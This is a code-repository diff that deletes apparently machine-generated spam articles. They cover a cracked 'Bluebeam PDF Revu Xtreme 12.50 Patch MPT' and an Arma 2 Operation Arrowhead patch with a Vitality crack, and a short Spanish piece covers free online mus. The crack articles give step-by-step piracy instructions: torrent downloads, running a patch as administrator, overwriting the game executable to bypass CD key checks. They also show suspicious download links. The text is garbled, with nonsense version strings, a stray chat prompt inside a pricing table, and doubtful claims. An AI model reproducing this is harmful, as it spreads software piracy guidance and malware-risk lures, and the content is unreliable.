      • It integrates with cloud services such as Dropbox, Box, OneDrive, SharePoint Online/365/2019/2016/2013/2010/2007/2003/2001/XP/2000/97/95/NT4/NT3.51/NT3.5/NT3.1/NT3/WFWG/WFW/WF/WIN/WIN95/WIN98/WINME/WINNT/WIN2000/WINXP/WINVISTA/WIN 7/SharePoint, Google Drive, and Bluebeam Studio.
      • -
      • It allows you to collaborate and share PDF files with other users in real time, with features such as chat, markup tracking, file locking, version control, and more.
      • -
      • It offers advanced features such as OCR (optical character recognition), forms creation and filling, digital signatures, batch processing, scripting, and more.
      • -
      -

      Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit is a modified version of the original software that has been cracked by a group of hackers called MPT (Music Patch Team). This patch removes the license verification and activation process of the software, allowing you to use it for free and without any limitations or restrictions.

      -

      However, using a patched software is illegal and risky, as it may contain malware, viruses, or spyware that can harm your computer or compromise your data. Moreover, you will not be able to receive any updates or technical support from the official developers of the software. Therefore, we do not recommend or endorse using Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, and we advise you to purchase the original software from the official website if you want to use it legally and safely.

      -

      -

      Requirements and compatibility of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -

      Before you download and install Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, you need to make sure that your computer meets the minimum system requirements and is compatible with the software. Here are the requirements and compatibility of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit:

      - - - - - - - - - - - - - - - - - - - - - - -
      Operating systemProcessorMemoryDisk spaceDisplay
      Windows 7 SP1/8/8.1/10 (64-bit only)Intel Core i3 or equivalent4 GB RAM (8 GB recommended)2 GB free disk space (4 GB recommended)1024 x 768 resolution (1920 x 1080 recommended)
      Mac OS X 10.10/10.11/10.12/10.13/10.14/10.15/11 (64-bit only)Intel Core i5 or equivalent4 GB RAM (8 GB recommended)2 GB free disk space (4 GB recommended)1024 x 768 resolution (1920 x 1080 recommended)
      -

      Note that Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit is not compatible with Linux or other operating systems.

      -

      How to download Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit?

      -

      If you want to download Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, you have two options: download it from the official website or download it from a torrent site.

      -

      Download from the official website

      -

      The official website of Bluebeam PDF Revu Xtreme is https://www.bluebeam.com/solutions/revu". Here you can find more information about the software, such as features, pricing, testimonials, support, and more.

      -

      To download Bluebeam PDF Revu Xtreme from the official website, you need to follow these steps:

      -
        -
      1. Go to https://www.bluebeam.com/solutions/revu".
      2. -
      3. Select the edition of Bluebeam PDF Revu Xtreme that suits your needs: Standard, CAD, or eXtreme.
      4. -
      5. Select the language of Bluebeam PDF Revu Xtreme that you prefer: English, German, Spanish, French, Swedish, Finnish, Norwegian, Danish, Dutch, Italian, Portuguese-Brazilian.
      6. -
      7. Select the version of Bluebeam PDF Revu Xtreme that matches your operating system: Windows or Mac.
      8. -
      9. Click on the "Download" button and save the file to your computer.
      10. -
      11. You will also receive an email with a link to download the software and a trial license key that will allow you to use the software for 30 days for free.
      12. -
      -

      Note that this is not the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, but the original version that requires activation and payment after the trial period expires.

      Download from a torrent site

      -

      Another option to download Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit is to use a torrent site. A torrent site is a website that hosts and distributes files that are shared by users through a peer-to-peer network. Torrent sites are often used to share pirated or illegal content, such as movies, music, games, software, and more.

      -

      To download Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, you need to follow these steps:

      -
        -
      1. Find a torrent site that has the file you are looking for. Some examples of popular torrent sites are The Pirate Bay, 1337x, RARBG, Torrentz2, and more.
      2. -
      3. Search for "Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit" on the torrent site and choose the file that has the most seeders and leechers. Seeders are users who have the complete file and are sharing it with others. Leechers are users who are downloading the file and are also sharing it with others.
      4. -
      5. Download the torrent file or magnet link of the file you have chosen. A torrent file is a small file that contains information about the file you want to download and the users who are sharing it. A magnet link is a URL that does the same thing as a torrent file but without requiring a separate file.
      6. -
      7. Open the torrent file or magnet link with a torrent client. A torrent client is a software that allows you to download and upload files through the torrent network. Some examples of popular torrent clients are uTorrent, BitTorrent, qBittorrent, Vuze, and more.
      8. -
      9. Wait for the download to finish and then open the downloaded folder. You should see the Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit installer and the patch file.
      10. -
      -

      Note that this is the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, but it is illegal and risky to use it, as it may contain malware, viruses, or spyware that can harm your computer or compromise your data. Moreover, you will not be able to receive any updates or technical support from the official developers of the software. Therefore, we do not recommend or endorse using Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, and we advise you to purchase the original software from the official website if you want to use it legally and safely.

      -

      How to install Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit?

      -

      After you have downloaded Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from either the official website or a torrent site, you need to install it on your computer. The installation process may vary depending on your operating system: Windows or Mac.

      -

      Installation instructions for Windows

      -

      To install Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit on Windows, you need to follow these steps:

      -
        -
      1. Double-click on the Bluebeam PDF Revu Xtreme 12.50 installer file that you have downloaded.
      2. -
      3. Follow the instructions on the screen to select your language, accept the license agreement, choose your installation location, and customize your installation options.
      4. -
      5. Click on the "Install" button and wait for the installation to complete.
      6. -
      7. If you have downloaded the original version of Bluebeam PDF Revu Xtreme 12.50 from the official website, you will need to activate it with the trial license key that you have received by email or purchase a full license key from the official website.
      8. -
      9. If you have downloaded the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, you will need to apply the patch file that you have downloaded.
      10. -
      11. To apply the patch file, right-click on it and select "Run as administrator".
      12. -
      13. A window will open with instructions on how to patch Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit.
      14. -
      15. Follow the instructions and click on the "Patch" button.
      16. -
      17. A message will appear confirming that Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit has been patched successfully.
      18. -
      19. Click on "OK" and close the window.
      20. -
      -

      You have now installed Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit on your Windows computer.

      -

      Installation instructions for Mac

      To install Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit on Mac, you need to follow these steps:
        -
      1. Double-click on the Bluebeam PDF Revu Xtreme 12.50 installer file that you have downloaded.
      2. -
      3. Follow the instructions on the screen to drag and drop the Bluebeam PDF Revu Xtreme 12.50 icon to the Applications folder.
      4. -
      5. If you have downloaded the original version of Bluebeam PDF Revu Xtreme 12.50 from the official website, you will need to activate it with the trial license key that you have received by email or purchase a full license key from the official website.
      6. -
      7. If you have downloaded the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, you will need to apply the patch file that you have downloaded.
      8. -
      9. To apply the patch file, right-click on it and select "Open".
      10. -
      11. A window will open with instructions on how to patch Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit.
      12. -
      13. Follow the instructions and click on the "Patch" button.
      14. -
      15. A message will appear confirming that Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit has been patched successfully.
      16. -
      17. Click on "OK" and close the window.
      18. -
      -

      You have now installed Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit on your Mac computer.

      -

      How to use Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit?

      -

      After you have installed Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit on your computer, you can start using it to create, edit, annotate, and share PDF files. Here are some tips on how to use Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit:

      -

      How to create, edit, and annotate PDF files with Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -
        -
      • To create a new PDF file, click on the "File" menu and select "New". You can choose to create a blank PDF file or use a template or a scanner.
      • -
      • To open an existing PDF file, click on the "File" menu and select "Open". You can browse your computer or cloud storage for the PDF file you want to open.
      • -
      • To edit a PDF file, use the tools in the "Edit" menu or toolbar. You can change the text, images, fonts, colors, layout, and more of your PDF file.
      • -
      • To annotate a PDF file, use the tools in the "Markup" menu or toolbar. You can add stamps, highlights, comments, shapes, measurements, hyperlinks, bookmarks, and more to your PDF file.
      • -
      • To save your changes to a PDF file, click on the "File" menu and select "Save" or "Save As". You can choose to save your PDF file in the same location or a different location, and with the same name or a different name.
      • -
      -

      How to collaborate and share PDF files with Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -
        -
      • To collaborate and share PDF files with other users in real time, use the "Studio" feature of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit. Studio is a cloud-based platform that allows you to create and join online sessions and projects where you can chat, markup, track, lock, version control, and share PDF files with other users.
      • -
      • To create a new Studio session or project, click on the "Studio" menu and select "New Session" or "New Project". You can name your session or project, invite participants, set permissions, upload files, and more.
      • -
      • To join an existing Studio session or project, click on the "Studio" menu and select "Join Session" or "Join Project". You can enter the session ID or project ID that you have received from the host or browse for available sessions or projects.
      • -
      • To share a PDF file via email or cloud service, click on the "File" menu and select "Share". You can choose to share your PDF file via email or cloud service such as Dropbox, Box, OneDrive, SharePoint Online/365/2019/2016/2013/2010/2007/2003/2001/XP/2000/97/95/NT4/NT3.51/NT3.5/NT3.1/NT3/WFWG/WFW/WF/WIN/W IN/WIN95/WIN98/WINME/WINNT/WIN2000/WINXP/WINVISTA/WIN7/SharePoint, Google Drive, and Bluebeam Studio. You can choose to share your PDF file as an attachment or a link, and add a message and a subject to your email.
      • -
      -

      How to troubleshoot common issues with Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit?

      -

      Sometimes, you may encounter some issues or problems with Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, such as activation or deactivation errors, update or uninstall errors, performance or compatibility issues, and more. Here are some tips on how to troubleshoot common issues with Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit:

      -

      How to activate or deactivate Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -
        -
      • If you have downloaded the original version of Bluebeam PDF Revu Xtreme 12.50 from the official website, you will need to activate it with a license key that you have purchased from the official website or received by email as a trial license key.
      • -
      • To activate Bluebeam PDF Revu Xtreme 12.50, click on the "Help" menu and select "Register". Enter your license key and click on "Register". A message will appear confirming that your software has been activated successfully.
      • -
      • To deactivate Bluebeam PDF Revu Xtreme 12.50, click on the "Help" menu and select "Unregister". A message will appear asking you to confirm your deactivation. Click on "Yes". A message will appear confirming that your software has been deactivated successfully.
      • -
      • If you have downloaded the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, you will not need to activate or deactivate it, as the patch file has already bypassed the license verification and activation process of the software.
      • -
      -

      How to update or uninstall Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit

      -
        -
      • If you have downloaded the original version of Bluebeam PDF Revu Xtreme 12.50 from the official website, you will be able to receive updates and patches from the official developers of the software.
      • -
      • To update Bluebeam PDF Revu Xtreme 12.50, click on the "Help" menu and select "Check for Updates". If there are any available updates, you will be prompted to download and install them.
      • -
      • To uninstall Bluebeam PDF Revu Xtreme 12.50, go to the Control Panel (Windows) or the Applications folder (Mac) and find the Bluebeam PDF Revu Xtreme 12.50 icon. Right-click on it and select "Uninstall" (Windows) or "Move to Trash" (Mac). Follow the instructions on the screen to complete the uninstallation process.
      • -
      • If you have downloaded the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, you will not be able to receive any updates or patches from the official developers of the software, as they may detect that your software is illegal and block it.
      • -
      • To update or uninstall Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, you will need to follow the same steps as above, but you may encounter some errors or problems due to the patch file that has modified the original software.
      • -
      -

      Conclusion

      -

      In this article, we have shown you how to install Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, a powerful and versatile software that lets you create, edit, annotate, and share PDF files with ease and efficiency.

      -

      We have also explained what Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit is, how to download it, how to use it, and how to troubleshoot common issues with it.

      -

      However, we have also warned you that using a patched software is illegal and risky, as it may contain malware, viruses, or spyware that can harm your computer or compromise your data. Moreover, you will not be able to receive any updates or technical support from the official developers of the software.

      -

      Therefore, we do not recommend or endorse using Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, and we advise you to purchase the original software from the official website if you want to use it legally and safely.

      -

      FAQs

      -

      Here are some frequently asked questions about Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit:

      -

      What is the difference between Bluebeam PDF Revu Xtreme Standard, CAD, and eXtreme editions?

      -

      Bluebeam PDF Revu Xtreme has three editions: Standard, CAD, and eXtreme. The main difference between them is the level of features and functions that they offer. Here is a comparison table of the three editions:

      - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
      FeatureStandardCADeXtreme
      Create PDF files from any sourceYesYesYes
      Edit and modify PDF filesYesYesYes
      Annotate and mark up PDF filesYesYesYes
      Support various file formats for importing and exporting dataYesYes (including CAD formats)Yes (including CAD formats)
      Integrate with cloud servicesYesYesYes
      Collaborate and share PDF files with other users in real timeYesYesYes
      OCR (optical character recognition)NoNoYes
      Forms creation and fillingNoNoYes
      Digital signaturesNoNoYes
      Batch processingNoNoYes
      ScriptingNoNoYes
      -

      You can choose the edition of Bluebeam PDF Revu Xtreme that suits your needs and budget from the official website.

      -

      How much does Bluebeam PDF Revu Xtreme cost?

      -

      The original version of Bluebeam PDF Revu Xtreme is not free, but it offers a 30-day free trial for you to test its features and functions. After the trial period expires, you will need to purchase a license key to continue using the software.

      -

      The price of Bluebeam PDF Revu Xtreme depends on the edition and the number of licenses that you want to buy. Here is the pricing table of Bluebeam PDF Revu Xtreme from the official website:

      - - - - - - - - - - - - - - -$499$4492,999 kr - - - - - - - - - - - - - - - - - -
      EditionPrice per license (USD)Price per license (EUR)Price per license (GBP)Price per license (AUD)Price per license (CAD)Price per license (SEK)
      Standard$349€299£249
      CAD$449 [assistant](#message) Continue writing the article. €399£349$649$5993,999 kr
      eXtreme$599€499£449$849 [assistant](#message) Continue writing the article. $7994,999 kr
      -

      You can also get discounts if you buy multiple licenses or if you are a student, educator, or academic institution. You can check the details and terms and conditions of the discounts from the official website.

      -

      Is Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit safe to use?

      -

      No, Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit is not safe to use, as it is a patched version of the original software that has been cracked by a group of hackers called MPT (Music Patch Team). This patch removes the license verification and activation process of the software, allowing you to use it for free and without any limitations or restrictions.

      -

      However, using a patched software is illegal and risky, as it may contain malware, viruses, or spyware that can harm your computer or compromise your data. Moreover, you will not be able to receive any updates or technical support from the official developers of the software.

      -

      Therefore, we do not recommend or endorse using Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, and we advise you to purchase the original software from the official website if you want to use it legally and safely.

      -

      How can I contact the support team of Bluebeam PDF Revu Xtreme?

      -

      If you have any questions, issues, or feedback about Bluebeam PDF Revu Xtreme, you can contact the support team of the software from the official website. Here are some ways to contact them:

      -
        -
      • By phone: You can call them at +1 (626) 788-4100 (US) or +45 89 88 31 88 (Europe).
      • -
      • By email: You can email them at support@bluebeam.com (US) or support@bluebeam.eu (Europe).
      • -
      • By chat: You can chat with them online from the official website.
      • -
      • By forum: You can join the Bluebeam Community Forum and post your questions or comments there.
      • -
      • By social media: You can follow them on Facebook, Twitter, LinkedIn, YouTube, and Instagram and send them messages there.
      • -
      -

      Note that these contact methods are only available for users who have purchased the original version of Bluebeam PDF Revu Xtreme from the official website. If you have downloaded the patched version of Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit from a torrent site, you will not be able to contact the support team of the software, as they may detect that your software is illegal and block it.

      -

      What are some alternatives to Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit?

      -

      If you are looking for some alternatives to Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit, here are some suggestions:

      -
        -
      • Adobe Acrobat Pro DC: This is a popular and professional software that lets you create, edit, annotate, and share PDF files with various features and functions. It also integrates with cloud services such as Adobe Document Cloud and Adobe Creative Cloud.
      • -
      • Nitro Pro: This is a powerful and user-friendly software that lets you create, edit, annotate, and share PDF files with various features and functions. It also integrates with cloud services such as Dropbox, Google Drive, OneDrive, SharePoint Online/365/2019/2016/2013/2010/2007/2003/2001/XP/2000/97/95/NT4/NT3.51/NT3.5/NT3.1/NT3/WFWG/WFW/WF/WIN/WIN95/WIN98/WINME/WINNT/WIN2000/WINXP/WINVISTA/WIN7/Nitro Cloud.
      • -
      • PDFelement: This is a simple and affordable software that lets you create, edit, annotate, and share PDF files with various features and functions. It also integrates with cloud services such as Dropbox, Google Drive, OneDrive, Box, Evernote , and more.
      • -
      • Foxit PhantomPDF: This is a fast and secure software that lets you create, edit, annotate, and share PDF files with various features and functions. It also integrates with cloud services such as Dropbox, Google Drive, OneDrive, Box, SharePoint Online/365/2019/2016/2013/2010/2007/2003/2001/XP/2000/97/95/NT4/NT3.51/NT3.5/NT3.1/NT3/WFWG/WFW/WF/WIN/WIN95/WIN98/WINME/WINNT/WIN2000/WINXP/WINVISTA/WIN7/Foxit Cloud.
      • -
      -

      You can compare and contrast these alternatives to Bluebeam PDF Revu Xtreme 12.50 Patch MPT 64 bit and choose the one that best suits your needs and preferences.

      b2dd77e56b
      -
      -
      \ No newline at end of file diff --git a/spaces/tioseFevbu/cartoon-converter/scripts/Arma 2 Operation Arrowhead Patch Crack 1.52 Checked.md b/spaces/tioseFevbu/cartoon-converter/scripts/Arma 2 Operation Arrowhead Patch Crack 1.52 Checked.md deleted file mode 100644 index 8113d3c1618cb79525ef3bf184e321e8346ed708..0000000000000000000000000000000000000000 --- a/spaces/tioseFevbu/cartoon-converter/scripts/Arma 2 Operation Arrowhead Patch Crack 1.52 Checked.md +++ /dev/null @@ -1,93 +0,0 @@ -
      -

      Arma 2 Operation Arrowhead Patch Crack 1.52 | Checked

      -

      If you are a fan of realistic military simulation games, you probably have heard of Arma 2 Operation Arrowhead, the stand-alone expansion pack for Arma 2, released in 2010 by Bohemia Interactive. This game offers a thrilling and immersive experience of modern warfare in a fictional country called Takistan, where you can play as various roles within the US Army, from infantrymen to pilots and tank crew.

      -

      However, to enjoy this game to the fullest, you need to make sure that you have the latest patch installed, which is patch 1.52. This patch fixes many bugs and glitches, improves game stability and performance, adds new features and content, and enhances the overall gameplay experience. In this article, we will show you how to download and install patch 1.52 from 1.50, how to check if you have it installed correctly, how to apply the crack file from Vitality to bypass the CD key verification, and how to fix some common issues that may arise after applying the patch.

      -

      Arma 2 Operation Arrowhead Patch Crack 1.52 | Checked


      Download File ☆☆☆ https://urlcod.com/2uHx8A



      -

      Introduction

      -

      What is Arma 2 Operation Arrowhead?

      -

      Arma 2 Operation Arrowhead is a stand-alone expansion pack for Arma 2, a military simulation game developed by Bohemia Interactive and released in 2009. Arma 2 Operation Arrowhead was released in June 2010 and does not require Arma 2 to play, although it can be combined with Arma 2 to create Arma 2 Combined Operations.

      -

      Arma 2 Operation Arrowhead is set three years after the conflict in Chernarus, portrayed in the original Arma 2, and takes place in a new flashpoint in the Green Sea Region, a fictional country called Takistan. The game features a story-driven single-player campaign, where you can enlist into various roles within the US Army, from basic infantrymen to special operatives, pilots, and tank crew. You can also play in cooperative mode with up to four friends or join multiplayer battles with up to 50 players.

      -

      The game boasts a realistic combat environment, with realistic ballistics, round deflection, thermal imaging, materials penetration, day/night cycle, dynamic wind, weather, and environmental effects. The game also offers a huge range of vehicles, weapons, units, and maps to choose from, as well as a powerful editor that allows you to create your own scenarios and missions.

      -

      What is patch 1.52 and why do you need it?

      -

      Patch 1.52 is the latest official update for Arma 2 Operation Arrowhead that was released in June 2010 by Bohemia Interactive. This patch fixes many bugs and glitches that were reported by players and testers, improves game stability and performance, adds new features and content, and enhances the overall gameplay experience.

      -

      -

      Some of the main changes and improvements that patch 1.52 brings are:

      -
        -
      • New features: British Armed Forces Lite (low quality textures), grenade launcher zeroing (use Page Up/Down keys), multiple weapon accessories (use F key), improved AI driving skills.
      • -
      • New content: New missions

        for all factions, new vehicles (LAV-25, ZU-23, S1203, TT650, Landrover), new weapons (M249, M240, Mk 16/17, M110, SMAW, M136), new models and textures.

      • -
      • Bug fixes: Fixed various issues with multiplayer, AI, animations, sounds, weapons, vehicles, missions, and editor.
      • -
      • Performance improvements: Optimized memory usage, reduced stuttering and lagging, improved loading times and stability.
      • -
      -

      You need patch 1.52 to play Arma 2 Operation Arrowhead online with other players who have the same version of the game. You also need patch 1.52 to enjoy the game without any annoying bugs or glitches that may ruin your immersion or gameplay. Patch 1.52 also adds more content and features that make the game more fun and realistic.

      -

      How to check if you have patch 1.52 installed?

      -

      To check if you have patch 1.52 installed, you can do the following:

      -
        -
      • Launch the game and look at the bottom right corner of the main menu screen. You should see the version number of the game displayed there. If it says 1.52, then you have patch 1.52 installed.
      • -
      • Alternatively, you can go to the game directory (usually C:\Program Files\Bohemia Interactive\ArmA 2 Operation Arrowhead) and look for a file called arma2oa.exe. Right-click on it and select Properties. Go to the Details tab and look for the File version field. If it says 1.52.0.0, then you have patch 1.52 installed.
      • -
      -

      How to download and install patch 1.52 from 1.50?

      -

      If you have patch 1.50 installed and want to update to patch 1.52, you can follow these steps:

      -

      Step 1: Download the patch file from a reliable source

      -

      The first thing you need to do is to download the patch file from a reliable source. You can download it from the official Bohemia Interactive website or from other trusted websites that host the file . The patch file is about 133 MB in size and is named ARMA2_OA_Build_75234.zip.

      -

      Make sure that you download the file from a secure and virus-free source. Do not download the file from any suspicious or unknown websites that may contain malware or spyware. Also, do not download any other files that claim to be patch 1.52 but have a different name or size.

      -

      Step 2: Run the patch installer and follow the instructions

      -

      Once you have downloaded the patch file, you need to run the patch installer and follow the instructions on the screen. To do this:

      -
        -
      • Extract the zip file to a folder on your computer using a program like WinRAR or 7-Zip.
      • -
      • Open the folder and double-click on ARMA2_OA_Build_75234.exe to launch the installer.
      • -
      • Select your language and click Next.
      • -
      • Read and accept the license agreement and click Next.
      • -
      • Select the destination folder where your game is installed (usually C:\Program Files\Bohemia Interactive\ArmA 2 Operation Arrowhead) and click Next.
      • -
      • Wait for the installer to copy and replace the files in your game directory.
      • -
      • Click Finish when the installation is complete.
      • -
      -

      Congratulations! You have successfully installed patch 1.52 for Arma 2 Operation Arrowhead.

      Step 3: Copy the crack file from the Vitality folder to the game directory

      -

      The last thing you need to do is to copy the crack file from the Vitality folder to the game directory. This will allow you to bypass the CD key verification and play the game without any problems. To do this:

      -
        -
      • Open the folder where you extracted the patch file and look for a folder named Vitality.
      • -
      • Open the Vitality folder and copy the file named arma2oa.exe.
      • -
      • Paste the file into your game directory (usually C:\Program Files\Bohemia Interactive\ArmA 2 Operation Arrowhead) and overwrite the existing file.
      • -
      -

      That's it! You have successfully applied the crack file for patch 1.52 for Arma 2 Operation Arrowhead.

      -

      How to fix common issues with patch 1.52?

      -

      Although patch 1.52 is supposed to fix many issues with the game, some players may still encounter some problems after applying the patch. Here are some of the most common issues and how to fix them:

      -

      Issue 1: Patch installation fails or gives an error message

      -

      If you have trouble installing the patch or get an error message during the installation, you may have one of these problems:

      -
        -
      • Your game is not updated to patch 1.50. You need to have patch 1.50 installed before you can install patch 1.52. You can download patch 1.50 from here.
      • -
      • Your game is not installed in the default location. The patch installer may not recognize your game directory if you have installed it in a different location than C:\Program Files\Bohemia Interactive\ArmA 2 Operation Arrowhead. You can either reinstall your game in the default location or manually select your game directory during the patch installation.
      • -
      • Your game is corrupted or modified. The patch installer may not work if your game files are corrupted or modified by other patches, mods, or cracks. You can either reinstall your game from scratch or verify your game files using Steam or other tools.
      • -
      -

      Issue 2: Game crashes or freezes after applying the patch

      -

      If your game crashes or freezes after applying the patch, you may have one of these problems:

      -
        -
      • Your system does not meet the minimum requirements for the game. The patch may increase the demand on your system resources, such as CPU, RAM, and GPU. You can check the minimum and recommended requirements for the game here. You can also lower your graphics settings or close other programs that may be running in the background.
      • -
      • Your drivers are outdated or incompatible. The patch may require updated or compatible drivers for your hardware devices, such as sound card, video card, and motherboard. You can check for driver updates using Windows Update or other tools.
      • -
      • Your antivirus or firewall is blocking the game. The patch may trigger a false positive from your antivirus or firewall software, which may prevent the game from running properly. You can try disabling your antivirus or firewall temporarily or adding an exception for your game directory.
      • -

      Issue 3: Game performance drops or lags after applying the patch

      -

      If your game performance drops or lags after applying the patch, you may have one of these problems:

      -
        -
      • Your game settings are too high for your system. The patch may add more details and effects to the game, which may require more processing power and memory. You can try lowering your game settings, such as resolution, texture quality, view distance, and shadows.
      • -
      • Your game cache is corrupted or outdated. The patch may change some of the game files, which may cause conflicts or errors with your game cache. You can try clearing your game cache by deleting the files in the Documents\ArmA 2 folder.
      • -
      • Your game mods are incompatible or conflicting. The patch may not be compatible or compatible with some of the mods that you have installed for the game, such as custom maps, units, weapons, or scripts. You can try disabling or removing your mods temporarily or updating them to the latest version.
      • -
      -

      Conclusion

      -

      Summary of the main points

      -

      In this article, we have shown you how to download and install patch 1.52 for Arma 2 Operation Arrowhead, how to check if you have it installed correctly, how to apply the crack file from Vitality to bypass the CD key verification, and how to fix some common issues that may arise after applying the patch.

      -

      Patch 1.52 is the latest official update for Arma 2 Operation Arrowhead that fixes many bugs and glitches, improves game stability and performance, adds new features and content, and enhances the overall gameplay experience. It is highly recommended that you install this patch if you want to play Arma 2 Operation Arrowhead online with other players who have the same version of the game or if you want to enjoy the game without any annoying bugs or glitches that may ruin your immersion or gameplay.

      -

      Call to action and final thoughts

      -

      If you have not installed patch 1.52 yet, what are you waiting for? Download it now from a reliable source and follow our simple steps to install it and apply the crack file from Vitality. You will be amazed by how much better your game will run and look after applying this patch.

      -

      If you have any questions or comments about this article or patch 1.52, feel free to leave them below. We would love to hear from you and help you out with any issues that you may have. Thank you for reading and happy gaming!

      -

      FAQs

      -

      Q: Can I play Arma 2 Operation Arrowhead without patch 1.52?

      -

      A: Yes, you can play Arma 2 Operation Arrowhead without patch 1.52, but you will miss out on many improvements and fixes that this patch offers. You will also not be able to play online with other players who have patch 1.52 installed.

      -

      Q: Can I install patch 1.52 over any previous version of the game?

      -

      A: No, you can only install patch 1.52 over patch 1.50. If you have an older version of the game, you need to update it to patch 1.50 first before installing patch 1.52.

      -

      Q: Can I use patch 1.52 with Arma 2 Combined Operations?

      -

      A: Yes, you can use patch 1.52 with Arma 2 Combined Operations, which is a combination of Arma 2 and Arma 2 Operation Arrowhead. However, you need to make sure that both games are updated to their latest patches (Arma 2: Patch 1.11 and Arma 2 Operation Arrowhead: Patch 1.52).

      -

      Q: Can I use patch 1.52 with other mods or addons for the game?

      -

      A: Yes, you can use patch 1.52 with other mods or addons for the game, as long as they are compatible or updated for this patch. Some of the popular mods that work with patch 1.52 are ACE (Advanced Combat Environment), ACRE (Advanced Combat Radio Environment), JSRS (Jarhead's Sound Redeployment), and CBA (Community Base Addons).

      -

      Q: Where can I find more information about patch 1.52?

      -

      A: You can find more information about patch 1.52 on the official Bohemia Interactive website or on the official Arma 2 Operation Arrowhead forums.

      b2dd77e56b
      -
      -
      \ No newline at end of file diff --git a/spaces/tioseFevbu/cartoon-converter/scripts/Jugar Al Mus Gratis Sin Registrarse.md b/spaces/tioseFevbu/cartoon-converter/scripts/Jugar Al Mus Gratis Sin Registrarse.md deleted file mode 100644 index 179808779785724723386ed06191b2552724d0a4..0000000000000000000000000000000000000000 --- a/spaces/tioseFevbu/cartoon-converter/scripts/Jugar Al Mus Gratis Sin Registrarse.md +++ /dev/null @@ -1,19 +0,0 @@ -
      -

      ¿Cómo jugar al mus gratis sin registrarse?

      -

      El mus es un juego de cartas muy popular en España y otros países de habla hispana. Se trata de un juego de estrategia, engaño y apuestas que se juega por parejas con una baraja española de 40 cartas.

      -

      jugar al mus gratis sin registrarse


      DOWNLOADhttps://urlcod.com/2uHvLc



      -

      Si quieres jugar al mus gratis sin registrarse, hay varias opciones disponibles en Internet. Una de ellas es el sitio web MusOnline, que te permite jugar al mus online con otros jugadores reales o con bots. No necesitas crear una cuenta ni descargar ningún programa, solo tienes que entrar en la página y elegir una mesa de juego.

      -

      Otra opción es el sitio web MusGratis, que también te ofrece la posibilidad de jugar al mus gratis sin registrarse. En este caso, puedes jugar al mus clásico o al mus a 8 reyes, una variante con más cartas y más posibilidades de juego. Además, puedes personalizar tu avatar y chatear con otros jugadores.

      -

      Finalmente, si prefieres jugar al mus gratis sin registrarse desde tu móvil o tablet, puedes descargar la aplicación Don Mus, disponible para Android e iOS. Esta aplicación te permite jugar al mus online o offline, con diferentes niveles de dificultad y opciones de configuración. También puedes participar en torneos y ligas y ganar premios virtuales.

      -

      Como ves, hay muchas formas de disfrutar del mus gratis sin registrarse. Solo tienes que elegir la que más te guste y empezar a jugar. ¡Diviértete!

      -

      - -

      El mus es un juego de origen incierto, aunque se cree que tiene influencias árabes, francesas e italianas. Se empezó a jugar en el siglo XVI y se popularizó en el siglo XIX, especialmente en el norte de España. Hoy en día, es uno de los juegos de cartas más practicados en el país y cuenta con numerosos campeonatos y torneos oficiales.

      -

      Para jugar al mus se necesita una baraja española de 40 cartas, dividida en cuatro palos: oros, copas, espadas y bastos. Cada palo tiene diez cartas numeradas del 1 al 7 y tres figuras: sota (10), caballo (11) y rey (12). El valor de las cartas depende del tipo de juego: grande, chica, pares o juego. El objetivo del juego es ganar el mayor número de envites o apuestas que se hacen en cada ronda.

      -

